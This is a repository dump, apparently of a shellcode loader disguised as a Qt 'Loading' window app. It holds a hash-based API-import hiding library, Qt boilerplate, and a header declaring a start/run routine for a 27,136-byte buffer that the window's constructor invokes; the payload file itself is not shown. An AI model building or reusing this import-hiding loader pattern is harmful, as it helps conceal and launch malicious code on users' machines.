} 403 | 404 | LAZY_IMPORTER_FORCEINLINE const char* name(size_type index) const noexcept 405 | { 406 | return reinterpret_cast( 407 | _base + reinterpret_cast( 408 | _base + _ied->AddressOfNames)[index]); 409 | } 410 | 411 | LAZY_IMPORTER_FORCEINLINE const char* address(size_type index) const noexcept 412 | { 413 | const auto* const rva_table = 414 | reinterpret_cast(_base + _ied->AddressOfFunctions); 415 | 416 | const auto* const ord_table = reinterpret_cast( 417 | _base + _ied->AddressOfNameOrdinals); 418 | 419 | return _base + rva_table[ord_table[index]]; 420 | } 421 | 422 | LAZY_IMPORTER_FORCEINLINE bool is_forwarded( 423 | const char* export_address) const noexcept 424 | { 425 | const auto ui_ied = reinterpret_cast(_ied); 426 | return (export_address > ui_ied && export_address < ui_ied + _ied_size); 427 | } 428 | }; 429 | 430 | struct safe_module_enumerator { 431 | using value_type = const detail::win::LDR_DATA_TABLE_ENTRY_T; 432 | value_type* value; 433 | value_type* head; 434 | 435 | LAZY_IMPORTER_FORCEINLINE safe_module_enumerator() noexcept 436 | : safe_module_enumerator(ldr_data_entry()) 437 | {} 438 | 439 | LAZY_IMPORTER_FORCEINLINE 440 | safe_module_enumerator(const detail::win::LDR_DATA_TABLE_ENTRY_T* ldr) noexcept 441 | : value(ldr->load_order_next()), head(value) 442 | {} 443 | 444 | LAZY_IMPORTER_FORCEINLINE void reset() noexcept 445 | { 446 | value = head->load_order_next(); 447 | } 448 | 449 | LAZY_IMPORTER_FORCEINLINE bool next() noexcept 450 | { 451 | value = value->load_order_next(); 452 | 453 | return value != head && value->DllBase; 454 | } 455 | }; 456 | 457 | struct unsafe_module_enumerator { 458 | using value_type = const detail::win::LDR_DATA_TABLE_ENTRY_T*; 459 | value_type value; 460 | 461 | LAZY_IMPORTER_FORCEINLINE unsafe_module_enumerator() noexcept 462 | : value(ldr_data_entry()) 463 | {} 464 | 465 | LAZY_IMPORTER_FORCEINLINE void reset() noexcept { value = ldr_data_entry(); } 466 | 467 | LAZY_IMPORTER_FORCEINLINE bool next() noexcept 468 | { 469 | value = value->load_order_next(); 470 | return true; 471 | } 472 | }; 473 | 474 | // provides the cached functions which use Derive classes methods 475 | template 476 | class lazy_base { 477 | protected: 478 | // This function is needed because every templated function 479 | // with different args has its own static buffer 480 | LAZY_IMPORTER_FORCEINLINE static void*& _cache() noexcept 481 | { 482 | static void* value = nullptr; 483 | return value; 484 | } 485 | 486 | public: 487 | template 488 | LAZY_IMPORTER_FORCEINLINE static T safe() noexcept 489 | { 490 | return Derived::template get(); 491 | } 492 | 493 | template 494 | LAZY_IMPORTER_FORCEINLINE static T cached() noexcept 495 | { 496 | auto& cached = _cache(); 497 | if(!cached) 498 | cached = Derived::template get(); 499 | 500 | return (T)(cached); 501 | } 502 | 503 | template 504 | LAZY_IMPORTER_FORCEINLINE static T safe_cached() noexcept 505 | { 506 | return cached(); 507 | } 508 | }; 509 | 510 | template 511 | struct lazy_module : lazy_base> { 512 | template 513 | LAZY_IMPORTER_FORCEINLINE static T get() noexcept 514 | { 515 | Enum e; 516 | do { 517 | if(hash(e.value->BaseDllName, get_offset(OHP)) == get_hash(OHP)) 518 | return (T)(e.value->DllBase); 519 | } while(e.next()); 520 | return {}; 521 | } 522 | 523 | template 524 | LAZY_IMPORTER_FORCEINLINE static T in(Ldr ldr) noexcept 525 | { 526 | safe_module_enumerator e((const detail::win::LDR_DATA_TABLE_ENTRY_T*)(ldr)); 527 | do { 528 | if(hash(e.value->BaseDllName, get_offset(OHP)) == get_hash(OHP)) 529 | return (T)(e.value->DllBase); 530 | } while(e.next()); 531 | return {}; 532 | } 533 | 534 | template 535 | LAZY_IMPORTER_FORCEINLINE static T in_cached(Ldr ldr) noexcept 536 | { 537 | auto& cached = lazy_base>::_cache(); 538 | if(!cached) 539 | cached = in(ldr); 540 | 541 | return (T)(cached); 542 | } 543 | }; 544 | 545 | template 546 | struct lazy_function : lazy_base, T> { 547 | using base_type = lazy_base, T>; 548 | 549 | template 550 | LAZY_IMPORTER_FORCEINLINE decltype(auto) operator()(Args&&... args) const 551 | { 552 | #ifndef LAZY_IMPORTER_CACHE_OPERATOR_PARENS 553 | return get()(LAZY_IMPORTER_CPP_FORWARD(Args, args)...); 554 | #else 555 | return this->cached()(LAZY_IMPORTER_CPP_FORWARD(Args, args)...); 556 | #endif 557 | } 558 | 559 | template 560 | LAZY_IMPORTER_FORCEINLINE static F get() noexcept 561 | { 562 | // for backwards compatability. 563 | // Before 2.0 it was only possible to resolve forwarded exports when 564 | // this macro was enabled 565 | #ifdef LAZY_IMPORTER_RESOLVE_FORWARDED_EXPORTS 566 | return forwarded(); 567 | #else 568 | 569 | Enum e; 570 | 571 | do { 572 | #ifdef LAZY_IMPORTER_HARDENED_MODULE_CHECKS 573 | if(!e.value->DllBase || !e.value->FullDllName.Length) 574 | continue; 575 | #endif 576 | 577 | const exports_directory exports(e.value->DllBase); 578 | 579 | if(exports) { 580 | auto export_index = exports.size(); 581 | while(export_index--) 582 | if(hash(exports.name(export_index), get_offset(OHP)) == get_hash(OHP)) 583 | return (F)(exports.address(export_index)); 584 | } 585 | } while(e.next()); 586 | return {}; 587 | #endif 588 | } 589 | 590 | template 591 | LAZY_IMPORTER_FORCEINLINE static F forwarded() noexcept 592 | { 593 | detail::win::UNICODE_STRING_T name; 594 | forwarded_hashes hashes{ 0, get_hash(OHP) }; 595 | 596 | Enum e; 597 | do { 598 | name = e.value->BaseDllName; 599 | name.Length -= 8; // get rid of .dll extension 600 | 601 | if(!hashes.module_hash || hash(name, get_offset(OHP)) == hashes.module_hash) { 602 | const exports_directory exports(e.value->DllBase); 603 | 604 | if(exports) { 605 | auto export_index = exports.size(); 606 | while(export_index--) 607 | if(hash(exports.name(export_index), get_offset(OHP)) == hashes.function_hash) { 608 | const auto addr = exports.address(export_index); 609 | 610 | if(exports.is_forwarded(addr)) { 611 | hashes = hash_forwarded( 612 | reinterpret_cast(addr), 613 | get_offset(OHP)); 614 | 615 | e.reset(); 616 | break; 617 | } 618 | return (F)(addr); 619 | } 620 | } 621 | } 622 | } while(e.next()); 623 | return {}; 624 | } 625 | 626 | template 627 | LAZY_IMPORTER_FORCEINLINE static F forwarded_safe() noexcept 628 | { 629 | return forwarded(); 630 | } 631 | 632 | template 633 | LAZY_IMPORTER_FORCEINLINE static F forwarded_cached() noexcept 634 | { 635 | auto& value = base_type::_cache(); 636 | if(!value) 637 | value = forwarded(); 638 | return (F)(value); 639 | } 640 | 641 | template 642 | LAZY_IMPORTER_FORCEINLINE static F forwarded_safe_cached() noexcept 643 | { 644 | return forwarded_cached(); 645 | } 646 | 647 | template 648 | LAZY_IMPORTER_FORCEINLINE static F in(Module m) noexcept 649 | { 650 | if(IsSafe && !m) 651 | return {}; 652 | 653 | const exports_directory exports((const char*)(m)); 654 | if(IsSafe && !exports) 655 | return {}; 656 | 657 | for(unsigned long i{};; ++i) { 658 | if(IsSafe && i == exports.size()) 659 | break; 660 | 661 | if(hash(exports.name(i), get_offset(OHP)) == get_hash(OHP)) 662 | return (F)(exports.address(i)); 663 | } 664 | return {}; 665 | } 666 | 667 | template 668 | LAZY_IMPORTER_FORCEINLINE static F in_safe(Module m) noexcept 669 | { 670 | return in(m); 671 | } 672 | 673 | template 674 | LAZY_IMPORTER_FORCEINLINE static F in_cached(Module m) noexcept 675 | { 676 | auto& value = base_type::_cache(); 677 | if(!value) 678 | value = in(m); 679 | return (F)(value); 680 | } 681 | 682 | template 683 | LAZY_IMPORTER_FORCEINLINE static F in_safe_cached(Module m) noexcept 684 | { 685 | return in_cached(m); 686 | } 687 | 688 | template 689 | LAZY_IMPORTER_FORCEINLINE static F nt() noexcept 690 | { 691 | return in(ldr_data_entry()->load_order_next()->DllBase); 692 | } 693 | 694 | template 695 | LAZY_IMPORTER_FORCEINLINE static F nt_safe() noexcept 696 | { 697 | return in_safe(ldr_data_entry()->load_order_next()->DllBase); 698 | } 699 | 700 | template 701 | LAZY_IMPORTER_FORCEINLINE static F nt_cached() noexcept 702 | { 703 | return in_cached(ldr_data_entry()->load_order_next()->DllBase); 704 | } 705 | 706 | template 707 | LAZY_IMPORTER_FORCEINLINE static F nt_safe_cached() noexcept 708 | { 709 | return in_safe_cached(ldr_data_entry()->load_order_next()->DllBase); 710 | } 711 | }; 712 | 713 | }} // namespace li::detail 714 | 715 | #endif // include guard 716 | -------------------------------------------------------------------------------- /Loading/Loading/main.cpp: -------------------------------------------------------------------------------- 1 | #include "Loading.h" 2 | #include 3 | 4 | int main(int argc, char *argv[]) 5 | { 6 | QApplication a(argc, argv); 7 | Loading w; 8 | w.show(); 9 | return a.exec(); 10 | } 11 | -------------------------------------------------------------------------------- /Loading/Loading/moc/moc_Loading.cpp: -------------------------------------------------------------------------------- 1 | /**************************************************************************** 2 | ** Meta object code from reading C++ file 'Loading.h' 3 | ** 4 | ** Created by: The Qt Meta Object Compiler version 67 (Qt 5.12.9) 5 | ** 6 | ** WARNING! All changes made in this file will be lost! 7 | *****************************************************************************/ 8 | 9 | #include "../../Loading.h" 10 | #include 11 | #include 12 | #if !defined(Q_MOC_OUTPUT_REVISION) 13 | #error "The header file 'Loading.h' doesn't include ." 14 | #elif Q_MOC_OUTPUT_REVISION != 67 15 | #error "This file was generated using the moc from 5.12.9. It" 16 | #error "cannot be used with the include files from this version of Qt." 17 | #error "(The moc has changed too much.)" 18 | #endif 19 | 20 | QT_BEGIN_MOC_NAMESPACE 21 | QT_WARNING_PUSH 22 | QT_WARNING_DISABLE_DEPRECATED 23 | struct qt_meta_stringdata_Loading_t { 24 | QByteArrayData data[1]; 25 | char stringdata0[8]; 26 | }; 27 | #define QT_MOC_LITERAL(idx, ofs, len) \ 28 | Q_STATIC_BYTE_ARRAY_DATA_HEADER_INITIALIZER_WITH_OFFSET(len, \ 29 | qptrdiff(offsetof(qt_meta_stringdata_Loading_t, stringdata0) + ofs \ 30 | - idx * sizeof(QByteArrayData)) \ 31 | ) 32 | static const qt_meta_stringdata_Loading_t qt_meta_stringdata_Loading = { 33 | { 34 | QT_MOC_LITERAL(0, 0, 7) // "Loading" 35 | 36 | }, 37 | "Loading" 38 | }; 39 | #undef QT_MOC_LITERAL 40 | 41 | static const uint qt_meta_data_Loading[] = { 42 | 43 | // content: 44 | 8, // revision 45 | 0, // classname 46 | 0, 0, // classinfo 47 | 0, 0, // methods 48 | 0, 0, // properties 49 | 0, 0, // enums/sets 50 | 0, 0, // constructors 51 | 0, // flags 52 | 0, // signalCount 53 | 54 | 0 // eod 55 | }; 56 | 57 | void Loading::qt_static_metacall(QObject *_o, QMetaObject::Call _c, int _id, void **_a) 58 | { 59 | Q_UNUSED(_o); 60 | Q_UNUSED(_id); 61 | Q_UNUSED(_c); 62 | Q_UNUSED(_a); 63 | } 64 | 65 | QT_INIT_METAOBJECT const QMetaObject Loading::staticMetaObject = { { 66 | &QMainWindow::staticMetaObject, 67 | qt_meta_stringdata_Loading.data, 68 | qt_meta_data_Loading, 69 | qt_static_metacall, 70 | nullptr, 71 | nullptr 72 | } }; 73 | 74 | 75 | const QMetaObject *Loading::metaObject() const 76 | { 77 | return QObject::d_ptr->metaObject ? QObject::d_ptr->dynamicMetaObject() : &staticMetaObject; 78 | } 79 | 80 | void *Loading::qt_metacast(const char *_clname) 81 | { 82 | if (!_clname) return nullptr; 83 | if (!strcmp(_clname, qt_meta_stringdata_Loading.stringdata0)) 84 | return static_cast(this); 85 | return QMainWindow::qt_metacast(_clname); 86 | } 87 | 88 | int Loading::qt_metacall(QMetaObject::Call _c, int _id, void **_a) 89 | { 90 | _id = QMainWindow::qt_metacall(_c, _id, _a); 91 | return _id; 92 | } 93 | QT_WARNING_POP 94 | QT_END_MOC_NAMESPACE 95 | -------------------------------------------------------------------------------- /Loading/Loading/rcc/qrc_Loading.cpp: -------------------------------------------------------------------------------- 1 | /**************************************************************************** 2 | ** Resource object code 3 | ** 4 | ** Created by: The Resource Compiler for Qt version 5.12.9 5 | ** 6 | ** WARNING! All changes made in this file will be lost! 7 | *****************************************************************************/ 8 | 9 | #ifdef QT_NAMESPACE 10 | # define QT_RCC_PREPEND_NAMESPACE(name) ::QT_NAMESPACE::name 11 | # define QT_RCC_MANGLE_NAMESPACE0(x) x 12 | # define QT_RCC_MANGLE_NAMESPACE1(a, b) a##_##b 13 | # define QT_RCC_MANGLE_NAMESPACE2(a, b) QT_RCC_MANGLE_NAMESPACE1(a,b) 14 | # define QT_RCC_MANGLE_NAMESPACE(name) QT_RCC_MANGLE_NAMESPACE2( \ 15 | QT_RCC_MANGLE_NAMESPACE0(name), QT_RCC_MANGLE_NAMESPACE0(QT_NAMESPACE)) 16 | #else 17 | # define QT_RCC_PREPEND_NAMESPACE(name) name 18 | # define QT_RCC_MANGLE_NAMESPACE(name) name 19 | #endif 20 | 21 | #ifdef QT_NAMESPACE 22 | namespace QT_NAMESPACE { 23 | #endif 24 | 25 | #ifdef QT_NAMESPACE 26 | } 27 | #endif 28 | 29 | int QT_RCC_MANGLE_NAMESPACE(qInitResources_Loading)(); 30 | int QT_RCC_MANGLE_NAMESPACE(qInitResources_Loading)() 31 | { 32 | return 1; 33 | } 34 | 35 | int QT_RCC_MANGLE_NAMESPACE(qCleanupResources_Loading)(); 36 | int QT_RCC_MANGLE_NAMESPACE(qCleanupResources_Loading)() 37 | { 38 | return 1; 39 | } 40 | 41 | namespace { 42 | struct initializer { 43 | initializer() { QT_RCC_MANGLE_NAMESPACE(qInitResources_Loading)(); } 44 | ~initializer() { QT_RCC_MANGLE_NAMESPACE(qCleanupResources_Loading)(); } 45 | } dummy; 46 | } 47 | -------------------------------------------------------------------------------- /Loading/Loading/uic/ui_Loading.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | ** Form generated from reading UI file 'Loading.ui' 3 | ** 4 | ** Created by: Qt User Interface Compiler version 5.12.9 5 | ** 6 | ** WARNING! All changes made in this file will be lost when recompiling UI file! 7 | ********************************************************************************/ 8 | 9 | #ifndef UI_LOADING_H 10 | #define UI_LOADING_H 11 | 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | 20 | QT_BEGIN_NAMESPACE 21 | 22 | class Ui_LoadingClass 23 | { 24 | public: 25 | QMenuBar *menuBar; 26 | QToolBar *mainToolBar; 27 | QWidget *centralWidget; 28 | QStatusBar *statusBar; 29 | 30 | void setupUi(QMainWindow *LoadingClass) 31 | { 32 | if (LoadingClass->objectName().isEmpty()) 33 | LoadingClass->setObjectName(QString::fromUtf8("LoadingClass")); 34 | LoadingClass->resize(600, 400); 35 | menuBar = new QMenuBar(LoadingClass); 36 | menuBar->setObjectName(QString::fromUtf8("menuBar")); 37 | LoadingClass->setMenuBar(menuBar); 38 | mainToolBar = new QToolBar(LoadingClass); 39 | mainToolBar->setObjectName(QString::fromUtf8("mainToolBar")); 40 | LoadingClass->addToolBar(mainToolBar); 41 | centralWidget = new QWidget(LoadingClass); 42 | centralWidget->setObjectName(QString::fromUtf8("centralWidget")); 43 | LoadingClass->setCentralWidget(centralWidget); 44 | statusBar = new QStatusBar(LoadingClass); 45 | statusBar->setObjectName(QString::fromUtf8("statusBar")); 46 | LoadingClass->setStatusBar(statusBar); 47 | 48 | retranslateUi(LoadingClass); 49 | 50 | QMetaObject::connectSlotsByName(LoadingClass); 51 | } // setupUi 52 | 53 | void retranslateUi(QMainWindow *LoadingClass) 54 | { 55 | LoadingClass->setWindowTitle(QApplication::translate("LoadingClass", "Loading", nullptr)); 56 | } // retranslateUi 57 | 58 | }; 59 | 60 | namespace Ui { 61 | class LoadingClass: public Ui_LoadingClass {}; 62 | } // namespace Ui 63 | 64 | QT_END_NAMESPACE 65 | 66 | #endif // UI_LOADING_H 67 | -------------------------------------------------------------------------------- /Loading/res/Loading.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecurityAnalysts01/ShellcodeLoader/1ff79fb9e1b9ad4934da88d9db82494d81a851c0/Loading/res/Loading.ico -------------------------------------------------------------------------------- /Loading_1.2/Loading.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.4.33110.190 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Loading", "Loading.vcxproj", "{C430F35E-F396-494F-B5AA-43D8BA1A42F1}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x86 = Debug|x86 11 | Release|x86 = Release|x86 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {C430F35E-F396-494F-B5AA-43D8BA1A42F1}.Debug|x86.ActiveCfg = Debug|Win32 15 | {C430F35E-F396-494F-B5AA-43D8BA1A42F1}.Debug|x86.Build.0 = Debug|Win32 16 | {C430F35E-F396-494F-B5AA-43D8BA1A42F1}.Release|x86.ActiveCfg = Release|Win32 17 | {C430F35E-F396-494F-B5AA-43D8BA1A42F1}.Release|x86.Build.0 = Release|Win32 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {3FAB5FFE-9354-496A-9899-64C62FF2DB98} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /Loading_1.2/Loading/Loading.cpp: -------------------------------------------------------------------------------- 1 | #include "Loading.h" 2 | #include "code.h" 3 | 4 | Loading::Loading(QWidget *parent) 5 | : QMainWindow(parent) 6 | { 7 | ui.setupUi(this); 8 | start(); 9 | } 10 | 11 | Loading::~Loading() 12 | {} 13 | -------------------------------------------------------------------------------- /Loading_1.2/Loading/Loading.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include "ui_Loading.h" 5 | 6 | class Loading : public QMainWindow 7 | { 8 | Q_OBJECT 9 | 10 | public: 11 | Loading(QWidget *parent = nullptr); 12 | ~Loading(); 13 | 14 | private: 15 | Ui::LoadingClass ui; 16 | }; 17 | -------------------------------------------------------------------------------- /Loading_1.2/Loading/code.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecurityAnalysts01/ShellcodeLoader/1ff79fb9e1b9ad4934da88d9db82494d81a851c0/Loading_1.2/Loading/code.cpp -------------------------------------------------------------------------------- /Loading_1.2/Loading/code.h: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | #define DATA_SIZE 27136 4 | 5 | 6 | int start(); 7 | 8 | void run(void* buffer); 9 | -------------------------------------------------------------------------------- /Loading_1.2/Loading/lazy_importer.hpp: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2018-2022 Justas Masiulis 3 | * 4 | * Licensed under the Apache License, Version 2.0 (the "License"); 5 | * you may not use this file except in compliance with the License. 6 | * You may obtain a copy of the License at 7 | * 8 | * http://www.apache.org/licenses/LICENSE-2.0 9 | * 10 | * Unless required by applicable law or agreed to in writing, software 11 | * distributed under the License is distributed on an "AS IS" BASIS, 12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | * See the License for the specific language governing permissions and 14 | * limitations under the License. 15 | */ 16 | 17 | // === FAQ === documentation is available at https://github.com/JustasMasiulis/lazy_importer 18 | // * Code doesn't compile with errors about pointer conversion: 19 | // - Try using `nullptr` instead of `NULL` or call `get()` instead of using the overloaded operator() 20 | // * Lazy importer can't find the function I want: 21 | // - Double check that the module in which it's located in is actually loaded 22 | // - Try #define LAZY_IMPORTER_CASE_INSENSITIVE 23 | // This will start using case insensitive comparison globally 24 | // - Try #define LAZY_IMPORTER_RESOLVE_FORWARDED_EXPORTS 25 | // This will enable forwarded export resolution globally instead of needing explicit `forwarded()` calls 26 | 27 | #ifndef LAZY_IMPORTER_HPP 28 | #define LAZY_IMPORTER_HPP 29 | 30 | 31 | #define LI_FN(name) ::li::detail::lazy_function() 32 | 33 | #define LI_FN_DEF(name) ::li::detail::lazy_function() 34 | 35 | #define LI_MODULE(name) ::li::detail::lazy_module() 36 | 37 | #ifndef LAZY_IMPORTER_CPP_FORWARD 38 | #ifdef LAZY_IMPORTER_NO_CPP_FORWARD 39 | #define LAZY_IMPORTER_CPP_FORWARD(t, v) v 40 | #else 41 | #include 42 | #define LAZY_IMPORTER_CPP_FORWARD(t, v) std::forward( v ) 43 | #endif 44 | #endif 45 | 46 | #include 47 | 48 | #ifndef LAZY_IMPORTER_NO_FORCEINLINE 49 | #if defined(_MSC_VER) 50 | #define LAZY_IMPORTER_FORCEINLINE __forceinline 51 | #elif defined(__GNUC__) && __GNUC__ > 3 52 | #define LAZY_IMPORTER_FORCEINLINE inline __attribute__((__always_inline__)) 53 | #else 54 | #define LAZY_IMPORTER_FORCEINLINE inline 55 | #endif 56 | #else 57 | #define LAZY_IMPORTER_FORCEINLINE inline 58 | #endif 59 | 60 | 61 | #ifdef LAZY_IMPORTER_CASE_INSENSITIVE 62 | #define LAZY_IMPORTER_CASE_SENSITIVITY false 63 | #else 64 | #define LAZY_IMPORTER_CASE_SENSITIVITY true 65 | #endif 66 | 67 | #define LAZY_IMPORTER_STRINGIZE(x) #x 68 | #define LAZY_IMPORTER_STRINGIZE_EXPAND(x) LAZY_IMPORTER_STRINGIZE(x) 69 | 70 | #define LAZY_IMPORTER_KHASH(str) ::li::detail::khash(str, \ 71 | ::li::detail::khash_impl( __TIME__ __DATE__ LAZY_IMPORTER_STRINGIZE_EXPAND(__LINE__) LAZY_IMPORTER_STRINGIZE_EXPAND(__COUNTER__), 2166136261 )) 72 | 73 | namespace li { namespace detail { 74 | 75 | namespace win { 76 | 77 | struct LIST_ENTRY_T { 78 | const char* Flink; 79 | const char* Blink; 80 | }; 81 | 82 | struct UNICODE_STRING_T { 83 | unsigned short Length; 84 | unsigned short MaximumLength; 85 | wchar_t* Buffer; 86 | }; 87 | 88 | struct PEB_LDR_DATA_T { 89 | unsigned long Length; 90 | unsigned long Initialized; 91 | const char* SsHandle; 92 | LIST_ENTRY_T InLoadOrderModuleList; 93 | }; 94 | 95 | struct PEB_T { 96 | unsigned char Reserved1[2]; 97 | unsigned char BeingDebugged; 98 | unsigned char Reserved2[1]; 99 | const char* Reserved3[2]; 100 | PEB_LDR_DATA_T* Ldr; 101 | }; 102 | 103 | struct LDR_DATA_TABLE_ENTRY_T { 104 | LIST_ENTRY_T InLoadOrderLinks; 105 | LIST_ENTRY_T InMemoryOrderLinks; 106 | LIST_ENTRY_T InInitializationOrderLinks; 107 | const char* DllBase; 108 | const char* EntryPoint; 109 | union { 110 | unsigned long SizeOfImage; 111 | const char* _dummy; 112 | }; 113 | UNICODE_STRING_T FullDllName; 114 | UNICODE_STRING_T BaseDllName; 115 | 116 | LAZY_IMPORTER_FORCEINLINE const LDR_DATA_TABLE_ENTRY_T* 117 | load_order_next() const noexcept 118 | { 119 | return reinterpret_cast( 120 | InLoadOrderLinks.Flink); 121 | } 122 | }; 123 | 124 | struct IMAGE_DOS_HEADER { // DOS .EXE header 125 | unsigned short e_magic; // Magic number 126 | unsigned short e_cblp; // Bytes on last page of file 127 | unsigned short e_cp; // Pages in file 128 | unsigned short e_crlc; // Relocations 129 | unsigned short e_cparhdr; // Size of header in paragraphs 130 | unsigned short e_minalloc; // Minimum extra paragraphs needed 131 | unsigned short e_maxalloc; // Maximum extra paragraphs needed 132 | unsigned short e_ss; // Initial (relative) SS value 133 | unsigned short e_sp; // Initial SP value 134 | unsigned short e_csum; // Checksum 135 | unsigned short e_ip; // Initial IP value 136 | unsigned short e_cs; // Initial (relative) CS value 137 | unsigned short e_lfarlc; // File address of relocation table 138 | unsigned short e_ovno; // Overlay number 139 | unsigned short e_res[4]; // Reserved words 140 | unsigned short e_oemid; // OEM identifier (for e_oeminfo) 141 | unsigned short e_oeminfo; // OEM information; e_oemid specific 142 | unsigned short e_res2[10]; // Reserved words 143 | long e_lfanew; // File address of new exe header 144 | }; 145 | 146 | struct IMAGE_FILE_HEADER { 147 | unsigned short Machine; 148 | unsigned short NumberOfSections; 149 | unsigned long TimeDateStamp; 150 | unsigned long PointerToSymbolTable; 151 | unsigned long NumberOfSymbols; 152 | unsigned short SizeOfOptionalHeader; 153 | unsigned short Characteristics; 154 | }; 155 | 156 | struct IMAGE_EXPORT_DIRECTORY { 157 | unsigned long Characteristics; 158 | unsigned long TimeDateStamp; 159 | unsigned short MajorVersion; 160 | unsigned short MinorVersion; 161 | unsigned long Name; 162 | unsigned long Base; 163 | unsigned long NumberOfFunctions; 164 | unsigned long NumberOfNames; 165 | unsigned long AddressOfFunctions; // RVA from base of image 166 | unsigned long AddressOfNames; // RVA from base of image 167 | unsigned long AddressOfNameOrdinals; // RVA from base of image 168 | }; 169 | 170 | struct IMAGE_DATA_DIRECTORY { 171 | unsigned long VirtualAddress; 172 | unsigned long Size; 173 | }; 174 | 175 | struct IMAGE_OPTIONAL_HEADER64 { 176 | unsigned short Magic; 177 | unsigned char MajorLinkerVersion; 178 | unsigned char MinorLinkerVersion; 179 | unsigned long SizeOfCode; 180 | unsigned long SizeOfInitializedData; 181 | unsigned long SizeOfUninitializedData; 182 | unsigned long AddressOfEntryPoint; 183 | unsigned long BaseOfCode; 184 | unsigned long long ImageBase; 185 | unsigned long SectionAlignment; 186 | unsigned long FileAlignment; 187 | unsigned short MajorOperatingSystemVersion; 188 | unsigned short MinorOperatingSystemVersion; 189 | unsigned short MajorImageVersion; 190 | unsigned short MinorImageVersion; 191 | unsigned short MajorSubsystemVersion; 192 | unsigned short MinorSubsystemVersion; 193 | unsigned long Win32VersionValue; 194 | unsigned long SizeOfImage; 195 | unsigned long SizeOfHeaders; 196 | unsigned long CheckSum; 197 | unsigned short Subsystem; 198 | unsigned short DllCharacteristics; 199 | unsigned long long SizeOfStackReserve; 200 | unsigned long long SizeOfStackCommit; 201 | unsigned long long SizeOfHeapReserve; 202 | unsigned long long SizeOfHeapCommit; 203 | unsigned long LoaderFlags; 204 | unsigned long NumberOfRvaAndSizes; 205 | IMAGE_DATA_DIRECTORY DataDirectory[16]; 206 | }; 207 | 208 | struct IMAGE_OPTIONAL_HEADER32 { 209 | unsigned short Magic; 210 | unsigned char MajorLinkerVersion; 211 | unsigned char MinorLinkerVersion; 212 | unsigned long SizeOfCode; 213 | unsigned long SizeOfInitializedData; 214 | unsigned long SizeOfUninitializedData; 215 | unsigned long AddressOfEntryPoint; 216 | unsigned long BaseOfCode; 217 | unsigned long BaseOfData; 218 | unsigned long ImageBase; 219 | unsigned long SectionAlignment; 220 | unsigned long FileAlignment; 221 | unsigned short MajorOperatingSystemVersion; 222 | unsigned short MinorOperatingSystemVersion; 223 | unsigned short MajorImageVersion; 224 | unsigned short MinorImageVersion; 225 | unsigned short MajorSubsystemVersion; 226 | unsigned short MinorSubsystemVersion; 227 | unsigned long Win32VersionValue; 228 | unsigned long SizeOfImage; 229 | unsigned long SizeOfHeaders; 230 | unsigned long CheckSum; 231 | unsigned short Subsystem; 232 | unsigned short DllCharacteristics; 233 | unsigned long SizeOfStackReserve; 234 | unsigned long SizeOfStackCommit; 235 | unsigned long SizeOfHeapReserve; 236 | unsigned long SizeOfHeapCommit; 237 | unsigned long LoaderFlags; 238 | unsigned long NumberOfRvaAndSizes; 239 | IMAGE_DATA_DIRECTORY DataDirectory[16]; 240 | }; 241 | 242 | struct IMAGE_NT_HEADERS { 243 | unsigned long Signature; 244 | IMAGE_FILE_HEADER FileHeader; 245 | #ifdef _WIN64 246 | IMAGE_OPTIONAL_HEADER64 OptionalHeader; 247 | #else 248 | IMAGE_OPTIONAL_HEADER32 OptionalHeader; 249 | #endif 250 | }; 251 | 252 | } // namespace win 253 | 254 | struct forwarded_hashes { 255 | unsigned module_hash; 256 | unsigned function_hash; 257 | }; 258 | 259 | // 64 bit integer where 32 bits are used for the hash offset 260 | // and remaining 32 bits are used for the hash computed using it 261 | using offset_hash_pair = unsigned long long; 262 | 263 | LAZY_IMPORTER_FORCEINLINE constexpr unsigned get_hash(offset_hash_pair pair) noexcept { return ( pair & 0xFFFFFFFF ); } 264 | 265 | LAZY_IMPORTER_FORCEINLINE constexpr unsigned get_offset(offset_hash_pair pair) noexcept { return ( pair >> 32 ); } 266 | 267 | template 268 | LAZY_IMPORTER_FORCEINLINE constexpr unsigned hash_single(unsigned value, char c) noexcept 269 | { 270 | return static_cast( 271 | (value ^ ((!CaseSensitive && c >= 'A' && c <= 'Z') ? (c | (1 << 5)) : c)) * 272 | static_cast(16777619)); 273 | } 274 | 275 | LAZY_IMPORTER_FORCEINLINE constexpr unsigned 276 | khash_impl(const char* str, unsigned value) noexcept 277 | { 278 | return (*str ? khash_impl(str + 1, hash_single(value, *str)) : value); 279 | } 280 | 281 | LAZY_IMPORTER_FORCEINLINE constexpr offset_hash_pair khash( 282 | const char* str, unsigned offset) noexcept 283 | { 284 | return ((offset_hash_pair{ offset } << 32) | khash_impl(str, offset)); 285 | } 286 | 287 | template 288 | LAZY_IMPORTER_FORCEINLINE unsigned hash(const CharT* str, unsigned offset) noexcept 289 | { 290 | unsigned value = offset; 291 | 292 | for(;;) { 293 | char c = *str++; 294 | if(!c) 295 | return value; 296 | value = hash_single(value, c); 297 | } 298 | } 299 | 300 | LAZY_IMPORTER_FORCEINLINE unsigned hash( 301 | const win::UNICODE_STRING_T& str, unsigned offset) noexcept 302 | { 303 | auto first = str.Buffer; 304 | const auto last = first + (str.Length / sizeof(wchar_t)); 305 | auto value = offset; 306 | for(; first != last; ++first) 307 | value = hash_single(value, static_cast(*first)); 308 | 309 | return value; 310 | } 311 | 312 | LAZY_IMPORTER_FORCEINLINE forwarded_hashes 